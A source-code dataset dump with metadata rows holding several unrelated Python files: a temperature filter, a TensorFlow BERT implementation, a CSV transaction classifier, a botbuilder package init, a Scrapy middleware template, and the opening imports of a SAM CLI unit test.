hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
aae2ca36a949bc8987839b2e06ad9a66b03318da | 318 | py | Python | ___Python/KarPoo/po1_kennenlernen/p03_lambda/m01_filtern.py | uvenil/PythonKurs201806 | 85afa9c9515f5dd8bec0c546f077d8cc39568fe8 | [
"Apache-2.0"
] | null | null | null | ___Python/KarPoo/po1_kennenlernen/p03_lambda/m01_filtern.py | uvenil/PythonKurs201806 | 85afa9c9515f5dd8bec0c546f077d8cc39568fe8 | [
"Apache-2.0"
] | null | null | null | ___Python/KarPoo/po1_kennenlernen/p03_lambda/m01_filtern.py | uvenil/PythonKurs201806 | 85afa9c9515f5dd8bec0c546f077d8cc39568fe8 | [
"Apache-2.0"
# Average monthly temperatures in Bielefeld.
celsius_temperaturen = [0.7, 2.1, 4.2, 8.2, 12.5, 15.6, 16.9, 16.3, 13.6, 9.5, 4.6, 2.3]

# Keep only the temperatures of at least 15 degrees:
gefiltert = [temperatur for temperatur in celsius_temperaturen if temperatur >= 15]
print(gefiltert)
print()
2173d7a0d159688bd01411cec21550906d3676e9 | 20,614 | py | Python | Bert/modeling.py | SmileTM/paper_coding | 992c4ff95358649130958d10b9dbe0bb31b6d1cb | [
"Apache-2.0"
] | 3 | 2020-02-14T17:05:59.000Z | 2020-11-16T03:41:07.000Z | Bert/modeling.py | SmileTM/paper_coding | 992c4ff95358649130958d10b9dbe0bb31b6d1cb | [
"Apache-2.0"
] | null | null | null | Bert/modeling.py | SmileTM/paper_coding | 992c4ff95358649130958d10b9dbe0bb31b6d1cb | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# File: modeling.py
# Author: SmileTM
# Site: s-tm.cn
# Github: https://github.com/SmileTM
# Time: 02.09.2020
#
import tensorflow as tf
import utils
import copy
import json
import six
class BertConfig(object):
    """Hyper-parameter container for `BertModel`.

    Mirrors the JSON configuration files that ship with pretrained BERT
    checkpoints; unknown JSON keys are attached as extra attributes by
    `from_dict`.
    """

    def __init__(self,
                 vocab_size=30522,  # vocabulary size
                 hidden_size=768,  # hidden dimension of the encoder
                 num_hidden_layers=12,  # number of Transformer layers
                 num_attention_heads=12,  # number of attention heads
                 intermediate_size=3072,  # inner dimension of the FFN Dense
                 hidden_act='gelu',  # activation function of the FFN
                 hidden_dropout_prob=0.0,  # dropout rate outside attention
                 attention_probs_dropout_prob=0.0,  # dropout rate inside attention
                 max_position_embeddings=512,  # maximum supported input length
                 type_vocab_size=16,  # number of token-type (segment) ids
                 initializer_range=0.02):  # stddev for truncated-normal init
        self.vocab_size = vocab_size
        self.num_attention_heads = num_attention_heads
        self.hidden_size = hidden_size
        self.num_hidden_layers = num_hidden_layers
        self.intermediate_size = intermediate_size
        self.max_position_embeddings = max_position_embeddings
        self.type_vocab_size = type_vocab_size
        self.hidden_act = hidden_act
        self.initializer_range = initializer_range
        self.attention_probs_dropout_prob = attention_probs_dropout_prob
        self.hidden_dropout_prob = hidden_dropout_prob

    @classmethod
    def from_dict(cls, json_object):
        """Constructs a `BertConfig` from a Python dictionary of parameters."""
        # Fixed: instantiate via `cls` (not the hard-coded class name) so
        # subclasses round-trip correctly through from_dict/from_json_file.
        config = cls(vocab_size=None)
        # Plain dict iteration: the file targets Python 3 (TF 2.x), so the
        # `six.iteritems` compatibility shim is unnecessary here.
        for (key, value) in json_object.items():
            config.__dict__[key] = value
        return config

    @classmethod
    def from_json_file(cls, json_file):
        """Constructs a `BertConfig` from a json file of parameters."""
        with tf.io.gfile.GFile(json_file, "r") as reader:
            text = reader.read()
        return cls.from_dict(json.loads(text))

    def to_dict(self):
        """Serializes this instance to a Python dictionary."""
        output = copy.deepcopy(self.__dict__)
        return output

    def to_json_string(self):
        """Serializes this instance to a JSON string."""
        return json.dumps(self.to_dict(), indent=2, sort_keys=True) + "\n"
class BertModel(tf.keras.layers.Layer):
    """BERT encoder: embedding stage, Transformer stack and [CLS] pooler.

    `call` takes a tuple (input_ids, input_mask, segment_ids) and returns
    (pooled_output, sequence_output); with mode == 'encoder' it returns the
    output of every Transformer layer instead.
    """

    def __init__(self, bertconfig: BertConfig, **kwargs):
        super(BertModel, self).__init__(**kwargs)
        self.config = bertconfig

    def build(self, input_shape):
        # Sub-layer names ('encoder', 'pooler_transform', ...) are part of
        # the checkpoint variable naming -- keep them stable.
        # NOTE: the keyword really is spelled "vocab_szie" (sic) in
        # EmbeddingProcessor's signature.
        self.embedding_processor = EmbeddingProcessor(vocab_szie=self.config.vocab_size,
                                                      hidden_size=self.config.hidden_size,
                                                      max_position_embeddings=self.config.max_position_embeddings,
                                                      type_vocab_size=self.config.type_vocab_size,
                                                      hidden_dropout_prob=self.config.hidden_dropout_prob,
                                                      initializer_range=self.config.initializer_range)
        self.encoder = Transformer(num_hidden_layers=self.config.num_hidden_layers,
                                   hidden_size=self.config.hidden_size,
                                   num_attention_heads=self.config.num_attention_heads,
                                   intermediate_size=self.config.intermediate_size,
                                   hidden_act=self.config.hidden_act,
                                   attention_probs_dropout_prob=self.config.attention_probs_dropout_prob,
                                   hidden_dropout_prob=self.config.hidden_dropout_prob,
                                   initializer_range=self.config.initializer_range,
                                   name='encoder'
                                   )
        # Dense + tanh over the first token's representation.
        self.pooler_transform = tf.keras.layers.Dense(
            units=self.config.hidden_size,
            activation="tanh",
            kernel_initializer=get_initializer(self.config.initializer_range),
            name="pooler_transform")
        super(BertModel, self).build(input_shape)

    def call(self, inputs, mode="bert"):
        """Run the encoder.

        Args:
            inputs: tuple (input_ids, input_mask, segment_ids).
            mode: 'encoder' returns the list of all layer outputs;
                any other value returns (pooled_output, sequence_output).
        """
        (input_ids, input_mask, segment_ids) = inputs
        input_tensor = self.embedding_processor((input_ids, segment_ids))
        attention_mask = create_attention_mask_from_input_mask(input_mask)
        if mode == 'encoder':
            return self.encoder((input_tensor, attention_mask), return_all_layers=True)
        sequence_output = self.encoder((input_tensor, attention_mask))
        # Pool the first ([CLS]) token of the sequence output.
        first_token_tensor = tf.squeeze(sequence_output[:, 0:1, :], axis=1)  # [batch_size ,hidden_size]
        pooled_output = self.pooler_transform(first_token_tensor)
        return (pooled_output, sequence_output)

    def get_embedding_table(self):
        # Word-embedding matrix, e.g. for weight tying with an MLM head.
        return self.embedding_processor.embedding_word_ids.embeddings

    def get_config(self):
        config = super(BertModel, self).get_config()
        config.update({"config": self.config.to_dict()})
        return config
class EmbeddingProcessor(tf.keras.layers.Layer):
    """BERT embedding stage: word + token-type + position embeddings,
    followed by layer normalization and dropout."""

    def __init__(self,
                 vocab_szie,
                 hidden_size=768,
                 max_position_embeddings=512,
                 type_vocab_size=16,
                 hidden_dropout_prob=0.0,
                 initializer_range=0.02,
                 **kwargs):
        # NOTE: the parameter is spelled "vocab_szie" (sic); callers pass it
        # by keyword and get_config serializes it, so the typo must be kept
        # to preserve the interface.
        super(EmbeddingProcessor, self).__init__(**kwargs)
        self.vocab_size = vocab_szie
        self.hidden_size = hidden_size
        self.max_position_embeddings = max_position_embeddings
        self.type_vocab_size = type_vocab_size
        self.hidden_dropout_prob = hidden_dropout_prob
        self.initializer_range = initializer_range

    def build(self, input_shape):
        # Word-id embedding table (also exposed via BertModel.get_embedding_table).
        self.embedding_word_ids = tf.keras.layers.Embedding(input_dim=self.vocab_size,
                                                            output_dim=self.hidden_size,
                                                            embeddings_initializer=get_initializer(
                                                                self.initializer_range),
                                                            name="embedding_word_ids",
                                                            dtype=tf.float32
                                                            )
        # Segment (token-type) embedding table.
        self.embedding_type_ids = tf.keras.layers.Embedding(input_dim=self.type_vocab_size,
                                                            output_dim=self.hidden_size,
                                                            embeddings_initializer=get_initializer(
                                                                self.initializer_range),
                                                            name="embedding_type_ids",
                                                            dtype=tf.float32)
        # Learned absolute position embeddings, sliced to the input length.
        self.embedding_pos = self.add_weight(name='embedding_pos/embeddings',
                                             shape=(self.max_position_embeddings, self.hidden_size),
                                             initializer=get_initializer(self.initializer_range),
                                             dtype=tf.float32)
        self.output_layer_norm = tf.keras.layers.LayerNormalization(
            name="layer_norm", axis=-1, epsilon=1e-12, dtype=tf.float32)
        self.output_dropout = tf.keras.layers.Dropout(
            rate=self.hidden_dropout_prob, dtype=tf.float32)
        super(EmbeddingProcessor, self).build(input_shape)

    def call(self, inputs):
        # inputs: (input_ids, segment_ids), both [batch_size, seq_length].
        input_ids, segment_ids = inputs
        seq_length = input_ids.shape[1]  # requires a statically known length
        token_word_embeddings = self.embedding_word_ids(input_ids)  # [batch_size, seq_length, hidden_size]
        token_type_embeddings = self.embedding_type_ids(segment_ids)  # [batch_size, seq_length, hidden_size]
        token_pos_embeddings = tf.expand_dims(self.embedding_pos[:seq_length, :],
                                              axis=0)  # [1, seq_length, hidden_size]
        # Sum the three embeddings (position broadcasts over the batch).
        output = token_word_embeddings + token_type_embeddings + token_pos_embeddings
        output = self.output_layer_norm(output)
        output = self.output_dropout(output)
        return output

    def get_config(self):
        # "vocab_szie" (sic) must match the __init__ keyword for round-trip.
        config = super(EmbeddingProcessor, self).get_config()
        config.update({"vocab_szie": self.vocab_size,
                       "hidden_size": self.hidden_size,
                       "max_position_embeddings": self.max_position_embeddings,
                       "type_vocab_size": self.type_vocab_size,
                       "hidden_dropout_prob": self.hidden_dropout_prob,
                       "initializer_range": self.initializer_range})
        return config
class Atttention(tf.keras.layers.Layer):
    """Multi-head scaled dot-product attention.

    The class name keeps its original (misspelled) form because other code
    in this file instantiates it by this name.
    """

    def __init__(self,
                 hidden_size=768,
                 num_attention_heads=12,
                 dropout_rate=0.0,
                 initializer_range=0.02,
                 **kwargs):
        super(Atttention, self).__init__(**kwargs)
        self.hidden_size = hidden_size
        self.num_attention_heads = num_attention_heads
        self.dropout_rate = dropout_rate
        self.initializer_range = initializer_range
        # Per-head dimension; assumes hidden_size % num_attention_heads == 0.
        self.d_head = hidden_size // num_attention_heads

    def build(self, input_shape):
        # Q/K/V projections; layer names are part of checkpoint naming.
        self.qw = tf.keras.layers.Dense(self.hidden_size,
                                        kernel_initializer=get_initializer(self.initializer_range),
                                        name='query')
        self.kw = tf.keras.layers.Dense(self.hidden_size,
                                        kernel_initializer=get_initializer(self.initializer_range),
                                        name='key')
        self.vw = tf.keras.layers.Dense(self.hidden_size,
                                        kernel_initializer=get_initializer(self.initializer_range),
                                        name='value')
        self.drop = tf.keras.layers.Dropout(rate=self.dropout_rate)
        self.outdense = tf.keras.layers.Dense(self.hidden_size,
                                              kernel_initializer=get_initializer(self.initializer_range),
                                              name='self_attention_output')
        super(Atttention, self).build(input_shape)

    def call(self, inputs):
        # inputs: (query, key, value, attention_mask); mask may be None.
        q, k, v, attention_mask = inputs
        q = self.qw(q)
        k = self.kw(k)
        v = self.vw(v)
        (q, k, v) = self.split_head(q=q, k=k, v=v)
        out = self.attention_procedure(q, k, v, attention_mask)
        # [batch, heads, seq, d_head] -> [batch, seq, heads, d_head]
        out = tf.einsum('BNFD->BFND', out)
        # Merge the heads back into the hidden dimension.
        out = tf.reshape(tensor=out, shape=[-1, out.shape[1], out.shape[2] * out.shape[3]])
        out = self.outdense(out)
        return out

    def split_head(self, q, k, v):
        """Reshape [batch, seq, hidden] to [batch, heads, seq, d_head]."""
        batch_size = tf.shape(q)[0]
        q = tf.reshape(q, (batch_size, -1, self.num_attention_heads, self.d_head))
        k = tf.reshape(k, (batch_size, -1, self.num_attention_heads, self.d_head))
        v = tf.reshape(v, (batch_size, -1, self.num_attention_heads, self.d_head))
        q = tf.einsum('BFND->BNFD', q)
        k = tf.einsum('BFND->BNFD', k)
        v = tf.einsum('BFND->BNFD', v)
        return (q, k, v)

    def attention_procedure(self, q, k, v, attention_mask):
        """Scaled dot-product attention over the already-split heads."""
        qk = tf.einsum('BNFD,BNfD->BNFf', q, k)
        dk = tf.cast(k.shape[-1], qk.dtype)
        attention_weights = qk / tf.sqrt(dk)
        if attention_mask is not None:
            # Broadcast over heads; push masked-out logits towards -inf.
            attention_mask = attention_mask[:, None, :, :]
            attention_weights += tf.cast(1.0 - attention_mask, attention_weights.dtype) * -1e9
        attention_probs = tf.nn.softmax(attention_weights)
        attention_probs = self.drop(attention_probs)
        out = tf.einsum('BNFf,BNfD->BNFD', attention_probs, v)
        return out

    def get_config(self):
        config = super(Atttention, self).get_config()
        config.update({"hidden_size": self.hidden_size,
                       "num_attention_heads": self.num_attention_heads,
                       # Fixed: the original serialized num_attention_heads
                       # under the "dropout_rate" key, corrupting round-trips.
                       "dropout_rate": self.dropout_rate,
                       "initializer_range": self.initializer_range})
        return config
class TransformerBlock(tf.keras.layers.Layer):
    """Single Transformer encoder block: self-attention plus position-wise
    FFN, each followed by dropout and a post-layer-norm residual."""

    def __init__(self,
                 num_attention_heads=12,
                 hidden_size=768,
                 intermediate_size=3072,
                 hidden_act='gelu',
                 initializer_range=0.02,
                 hidden_dropout_prob=0.0,
                 attention_probs_dropout_prob=0.0,
                 **kwargs):
        super(TransformerBlock, self).__init__(**kwargs)
        self.num_attention_heads = num_attention_heads
        self.hidden_size = hidden_size
        self.intermediate_size = intermediate_size
        self.hidden_act = hidden_act
        self.initializer_range = initializer_range
        self.hidden_dropout_prob = hidden_dropout_prob
        self.attention_probs_dropout_prob = attention_probs_dropout_prob

    def build(self, input_shape):
        self.attention = Atttention(hidden_size=self.hidden_size,
                                    num_attention_heads=self.num_attention_heads,
                                    dropout_rate=self.attention_probs_dropout_prob,
                                    name="self_attention")
        self.attention_layer_norm = tf.keras.layers.LayerNormalization(name="self_attention_layer_norm",
                                                                       axis=-1,
                                                                       epsilon=1e-12,
                                                                       dtype=tf.float32)
        self.attention_dropout = tf.keras.layers.Dropout(rate=self.hidden_dropout_prob)
        self.output_dropout = tf.keras.layers.Dropout(rate=self.hidden_dropout_prob)
        # kernel_initializer added for consistency with every other Dense in
        # this file (attention projections, pooler), which all use the
        # truncated-normal initializer.
        self.output_dense1 = tf.keras.layers.Dense(self.intermediate_size,
                                                   activation=utils.get_activation(self.hidden_act),
                                                   kernel_initializer=get_initializer(self.initializer_range),
                                                   name='intermediate'
                                                   )
        self.output_dense2 = tf.keras.layers.Dense(self.hidden_size,
                                                   activation=None,
                                                   kernel_initializer=get_initializer(self.initializer_range),
                                                   name='output'
                                                   )
        self.output_layer_norm = tf.keras.layers.LayerNormalization(name="output_layer_norm",
                                                                    axis=-1,
                                                                    epsilon=1e-12,
                                                                    dtype=tf.float32)
        super(TransformerBlock, self).build(input_shape)

    def call(self, inputs):
        (input_tensor, attention_mask) = inputs
        # Self-attention (q = k = v = input) + dropout + residual + norm.
        attention_output = self.attention((input_tensor, input_tensor, input_tensor, attention_mask))
        attention_output = self.attention_dropout(attention_output)
        attention_output = self.attention_layer_norm(input_tensor + attention_output)
        # Position-wise feed-forward network + dropout + residual + norm.
        layer_output = self.output_dense1(attention_output)
        layer_output = self.output_dense2(layer_output)
        layer_output = self.output_dropout(layer_output)
        layer_output = self.output_layer_norm(layer_output + attention_output)
        return layer_output

    def get_config(self):
        config = super(TransformerBlock, self).get_config()
        config.update({"num_attention_heads": self.num_attention_heads,
                       "hidden_size": self.hidden_size,
                       # Fixed: the original serialized initializer_range
                       # under the "intermediate_size" key.
                       "intermediate_size": self.intermediate_size,
                       "hidden_act": self.hidden_act,
                       "initializer_range": self.initializer_range,
                       "hidden_dropout_prob": self.hidden_dropout_prob,
                       "attention_probs_dropout_prob": self.attention_probs_dropout_prob
                       })
        return config
class Transformer(tf.keras.layers.Layer):
    """Stack of `TransformerBlock` layers applied sequentially."""

    def __init__(self,
                 num_attention_heads=12,
                 hidden_size=768,
                 num_hidden_layers=12,
                 intermediate_size=3072,
                 hidden_act='gelu',
                 initializer_range=0.02,
                 attention_probs_dropout_prob=0.0,
                 hidden_dropout_prob=0.0,
                 **kwargs):
        super(Transformer, self).__init__(**kwargs)
        self.num_attention_heads = num_attention_heads
        self.hidden_size = hidden_size
        self.num_hidden_layers = num_hidden_layers
        self.intermediate_size = intermediate_size
        self.hidden_act = hidden_act
        self.initializer_range = initializer_range
        self.hidden_dropout_prob = hidden_dropout_prob
        self.attention_probs_dropout_prob = attention_probs_dropout_prob

    def build(self, input_shape):
        # One block per hidden layer; the names "layer_0" .. "layer_N-1"
        # are part of the checkpoint variable naming.
        self.layers = [
            TransformerBlock(num_attention_heads=self.num_attention_heads,
                             hidden_size=self.hidden_size,
                             intermediate_size=self.intermediate_size,
                             hidden_act=self.hidden_act,
                             initializer_range=self.initializer_range,
                             hidden_dropout_prob=self.hidden_dropout_prob,
                             attention_probs_dropout_prob=self.attention_probs_dropout_prob,
                             name=("layer_%d" % layer_idx))
            for layer_idx in range(self.num_hidden_layers)
        ]
        super(Transformer, self).build(input_shape)

    def call(self, inputs, return_all_layers=False):
        hidden_states, attention_mask = inputs
        layer_outputs = []
        for block in self.layers:
            hidden_states = block((hidden_states, attention_mask))
            layer_outputs.append(hidden_states)
        # Either every intermediate output or just the final one.
        return layer_outputs if return_all_layers else layer_outputs[-1]

    def get_config(self):
        config = super(Transformer, self).get_config()
        config.update({"num_attention_heads": self.num_attention_heads,
                       "hidden_size": self.hidden_size,
                       "num_hidden_layers": self.num_hidden_layers,
                       "intermediate_size": self.intermediate_size,
                       "hidden_act": self.hidden_act,
                       "initializer_range": self.initializer_range,
                       "attention_probs_dropout_prob": self.attention_probs_dropout_prob,
                       "hidden_dropout_prob": self.hidden_dropout_prob,
                       })
        return config
def get_initializer(initializer_range=0.02):
    """Build a truncated-normal weight initializer.

    Args:
        initializer_range: standard deviation of the truncated normal.

    Returns:
        A `tf.keras.initializers.TruncatedNormal` instance.
    """
    stddev = initializer_range
    return tf.keras.initializers.TruncatedNormal(stddev=stddev)
def create_attention_mask_from_input_mask(mask):
    '''
    Build a 2-D attention mask from a 1-D padding mask.

    :param mask: shape = [batch_size, seq_length]
    :return: attention_mask, shape = [batch_size, seq_length, seq_length]
    '''
    # Outer product: position (f, t) is attendable iff both tokens are real.
    attention_mask = tf.einsum('BF,BT->BFT', mask, mask)
    return tf.cast(attention_mask, tf.float32)
if __name__ == '__main__':
    # Smoke test: build the functional model and load a local checkpoint.
    input_ids = tf.keras.layers.Input(shape=(512,))
    input_mask = tf.keras.layers.Input(shape=(512,))
    segment_ids = tf.keras.layers.Input(shape=(512,))
    config = BertConfig(max_position_embeddings=512, vocab_size=21128, type_vocab_size=2)
    bertModel = BertModel(config)
    output = bertModel((input_ids, input_mask, segment_ids))
    # NOTE(review): the Model's `inputs` tuple is (segment_ids, input_mask,
    # input_ids) while BertModel was called with (input_ids, input_mask,
    # segment_ids). All three placeholders share the same shape, so feeding
    # data positionally would silently swap ids and segments -- confirm the
    # intended ordering.
    model = tf.keras.Model(inputs=(segment_ids, input_mask, input_ids), outputs=output)
    #
    # print(model.trainable_weights)
    model.summary()
    # NOTE(review): hard-coded absolute checkpoint path; this only works on
    # the original author's machine.
    model.load_weights('/Users/lollipop/Documents/paper_coding/Bert/out_new/bert_model.ckpt')
    # print(model.trainable_weights)
    # model.trainable_weights[-1].numpy = tf.random.uniform(shape=(768,), dtype=tf.float32)
    # model.layers[-1].trainable_weights[-1].assign(tf.ones(shape=(768,), dtype=tf.float32))
    # print(model.layers[-1].trainable_weights[-1])
    print('@@@@@@@@')
    print(model.trainable_weights)
    for i in model.trainable_weights:
        print(i.name)
| 45.606195 | 114 | 0.579703 |
96f04db0c6ebb8cd2fbf8cbb698fadabe1d378a5 | 2,429 | py | Python | abcli/commands/csv/classify.py | john5f35/abcli | fa696cf6bcc2f26fbd754e01952553ce09e5e006 | [
"MIT"
] | 3 | 2019-10-19T15:07:34.000Z | 2022-01-07T01:49:24.000Z | abcli/commands/csv/classify.py | john5f35/abcli | fa696cf6bcc2f26fbd754e01952553ce09e5e006 | [
"MIT"
] | null | null | null | abcli/commands/csv/classify.py | john5f35/abcli | fa696cf6bcc2f26fbd754e01952553ce09e5e006 | [
"MIT"
] | 1 | 2022-03-12T03:22:29.000Z | 2022-03-12T03:22:29.000Z | import csv
import logging
import re
from pathlib import Path
from pprint import PrettyPrinter
import click
import yaml
from abcli.utils import PathType
pformat = PrettyPrinter().pformat  # module-level pretty-print shortcut
logger = logging.getLogger()  # root logger; NOTE(review): getLogger(__name__) is more conventional
def classify(txns: [dict], rulebook: dict) -> [dict]:
    """Tag each transaction with its account/category from the rule book.

    Keyword rules (case-insensitive substring match) are tried before regex
    rules. A string rule sets the 'that_auto' field; a dict rule is merged
    into the transaction. Unmatched transactions pass through unchanged.

    Note: return annotation fixed -- the function returns only the list of
    transactions, not a (list, int) tuple.
    """
    restxns = []

    def _lookup_rulebook(note):
        # First matching keyword wins, then first matching regex.
        for keyword, rule in rulebook['keyword'].items():
            if keyword.upper() in note.upper():
                return rule
        for regex, rule in rulebook['regex'].items():
            if re.match(regex, note):
                return rule
        return None  # explicit: no rule matched

    for txn in txns:  # unused enumerate() index removed
        rule = _lookup_rulebook(txn['description'])
        if rule is not None:
            if isinstance(rule, str):
                txn['that_auto'] = rule
            if isinstance(rule, dict):
                txn.update(rule)
        restxns.append(txn)
    return restxns
@click.command("classify")
@click.option("-r", "--rulebook", "rulebook_path", type=PathType(exists=True, dir_okay=False),
              help='Rule book JSON file for assigning accounts/categories; default can be specified in config.json')
@click.argument("csvpath", type=PathType(exists=True, dir_okay=False))
def cmd_classify(csvpath: Path, rulebook_path: Path):
    """Classify the transactions in CSVPATH in place using the rule book."""
    rulebook = _load_rulebook(rulebook_path)
    # newline='' is required by the csv module so quoted newlines are parsed
    # correctly and no extra blank rows are written on Windows.
    with csvpath.open('r', encoding='utf-8', newline='') as fp:
        reader = csv.DictReader(fp)
        fieldnames = reader.fieldnames
        rows = list(reader)
    restxns = classify(rows, rulebook)
    # .get(): input CSVs may lack the classification columns entirely.
    num_classified = len(list(filter(lambda txn: txn.get('that_auto') or txn.get('that_overwrite'), restxns)))
    total = len(restxns)
    # Guard against an empty CSV to avoid ZeroDivisionError.
    percent = int(num_classified / total * 100) if total else 0
    click.echo(f"{num_classified}/{total} classified ({percent}%)")
    with csvpath.open('w', encoding='utf-8', newline='') as fp:
        writer = csv.DictWriter(fp, fieldnames)
        writer.writeheader()
        writer.writerows(restxns)
# Config key under which a default rule book path may be stored.
CONFIG_RULEBOOK_KEY = "csv.classify.rulebook"
def _load_rulebook(rb_path: Path):
    """Load the YAML rule book from rb_path.

    Falls back to the path stored under CONFIG_RULEBOOK_KEY in the click
    context meta; raises click.UsageError if neither is available.
    """
    if rb_path is None:
        config = click.get_current_context().meta
        if config.get(CONFIG_RULEBOOK_KEY, None):
            rb_path = Path(config[CONFIG_RULEBOOK_KEY])
        else:
            raise click.UsageError(f"Rulebook path not specified on command line, nor defined in config JSON.",
                                   click.get_current_context())
    with rb_path.open('r', encoding='utf-8') as fp:
        return yaml.full_load(fp)
 | 31.141026 | 116 | 0.645121 |
80ac54c228d273e31c5a2a723b6d2a4643ed42f5 | 1,942 | py | Python | libraries/botbuilder-core/botbuilder/core/__init__.py | congysu/botbuilder-python | 274663dd91c811bae6ac4488915ba5880771b0a7 | [
"MIT"
] | null | null | null | libraries/botbuilder-core/botbuilder/core/__init__.py | congysu/botbuilder-python | 274663dd91c811bae6ac4488915ba5880771b0a7 | [
"MIT"
] | null | null | null | libraries/botbuilder-core/botbuilder/core/__init__.py | congysu/botbuilder-python | 274663dd91c811bae6ac4488915ba5880771b0a7 | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from .about import __version__
from .activity_handler import ActivityHandler
from .assertions import BotAssert
from .bot_adapter import BotAdapter
from .bot_framework_adapter import BotFrameworkAdapter, BotFrameworkAdapterSettings
from .bot_state import BotState
from .bot_telemetry_client import BotTelemetryClient
from .card_factory import CardFactory
from .conversation_state import ConversationState
from .memory_storage import MemoryStorage
from .message_factory import MessageFactory
from .middleware_set import AnonymousReceiveMiddleware, Middleware, MiddlewareSet
from .null_telemetry_client import NullTelemetryClient
from .state_property_accessor import StatePropertyAccessor
from .state_property_info import StatePropertyInfo
from .storage import Storage, StoreItem, StorageKeyFactory, calculate_change_hash
from .turn_context import TurnContext
from .user_state import UserState
# Public API of `botbuilder.core`; governs `from botbuilder.core import *`.
__all__ = ['ActivityHandler',
           'AnonymousReceiveMiddleware',
           'BotAdapter',
           'BotAssert',
           'BotFrameworkAdapter',
           'BotFrameworkAdapterSettings',
           'BotState',
           'BotTelemetryClient',
           'calculate_change_hash',
           'CardFactory',
           'ConversationState',
           'MemoryStorage',
           'MessageFactory',
           'Middleware',
           'MiddlewareSet',
           'NullTelemetryClient',
           'StatePropertyAccessor',
           'StatePropertyInfo',
           'Storage',
           'StorageKeyFactory',
           'StoreItem',
           'TurnContext',
           'UserState',
           '__version__']
 | 38.078431 | 83 | 0.659629 |
b00d21e7e3c96f5b3d581f223d3818e1259bd694 | 3,648 | py | Python | mycwpjt/mycwpjt/middlewares.py | aibittek/PythonSpider | 64b2d6f8fe016d79a990ee735754b811cf285df0 | [
"MIT"
] | null | null | null | mycwpjt/mycwpjt/middlewares.py | aibittek/PythonSpider | 64b2d6f8fe016d79a990ee735754b811cf285df0 | [
"MIT"
] | null | null | null | mycwpjt/mycwpjt/middlewares.py | aibittek/PythonSpider | 64b2d6f8fe016d79a990ee735754b811cf285df0 | [
"MIT"
] | null | null | null | # Define here the models for your spider middleware
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
# useful for handling different item types with a single interface
from itemadapter import is_item, ItemAdapter
class MycwpjtSpiderMiddleware:
    """Spider middleware template: passes everything through unchanged.

    Only ``spider_opened`` does observable work (a log line); the hook
    methods exist so Scrapy recognises the middleware interface. Undefined
    hooks would simply be skipped by Scrapy.
    """

    @classmethod
    def from_crawler(cls, crawler):
        # Factory used by Scrapy; subscribes to the spider_opened signal.
        middleware = cls()
        crawler.signals.connect(middleware.spider_opened, signal=signals.spider_opened)
        return middleware

    def process_spider_input(self, response, spider):
        # Let every response enter the spider untouched.
        return None

    def process_spider_output(self, response, result, spider):
        # Forward every item/request produced by the spider as-is.
        yield from result

    def process_spider_exception(self, response, exception, spider):
        # No special handling; other middlewares / the engine decide.
        return None

    def process_start_requests(self, start_requests, spider):
        # Start requests pass through unmodified.
        yield from start_requests

    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)
class MycwpjtDownloaderMiddleware:
    """Downloader middleware template: a transparent pass-through.

    Requests continue down the chain, responses come back unmodified, and
    exceptions are left for other middlewares to handle.
    """

    @classmethod
    def from_crawler(cls, crawler):
        # Factory used by Scrapy; subscribes to the spider_opened signal.
        middleware = cls()
        crawler.signals.connect(middleware.spider_opened, signal=signals.spider_opened)
        return middleware

    def process_request(self, request, spider):
        # Returning None lets the request continue through the chain
        # (alternatives: return a Response/Request, or raise IgnoreRequest).
        return None

    def process_response(self, request, response, spider):
        # Hand the downloaded response back unchanged.
        return response

    def process_exception(self, request, exception, spider):
        # Returning None continues normal exception processing.
        return None

    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)
| 35.076923 | 78 | 0.674342 |
ab13e8e7fc69150cbc4bb5aa0e3772435d69d37a | 29,848 | py | Python | tests/unit/lib/schemas/test_schemas_api_caller.py | G4brym/aws-sam-cli | 0601140f031f5b325b1861b298a6a589cf9c072b | [
"BSD-2-Clause",
"Apache-2.0"
] | 1 | 2019-05-01T08:27:35.000Z | 2019-05-01T08:27:35.000Z | tests/unit/lib/schemas/test_schemas_api_caller.py | G4brym/aws-sam-cli | 0601140f031f5b325b1861b298a6a589cf9c072b | [
"BSD-2-Clause",
"Apache-2.0"
] | 1 | 2020-10-05T17:15:43.000Z | 2020-10-05T17:15:43.000Z | tests/unit/lib/schemas/test_schemas_api_caller.py | G4brym/aws-sam-cli | 0601140f031f5b325b1861b298a6a589cf9c072b | [
"BSD-2-Clause",
"Apache-2.0"
] | 1 | 2021-11-29T19:10:17.000Z | 2021-11-29T19:10:17.000Z | import io
import tempfile
from unittest.mock import Mock, call
from unittest import TestCase
import botocore
from botocore.exceptions import WaiterError
from samcli.lib.schemas.schemas_constants import DEFAULT_EVENT_SOURCE, DEFAULT_EVENT_DETAIL_TYPE
from samcli.commands.exceptions import SchemasApiException
from samcli.commands.local.cli_common.user_exceptions import ResourceNotFound, NotAvailableInRegion
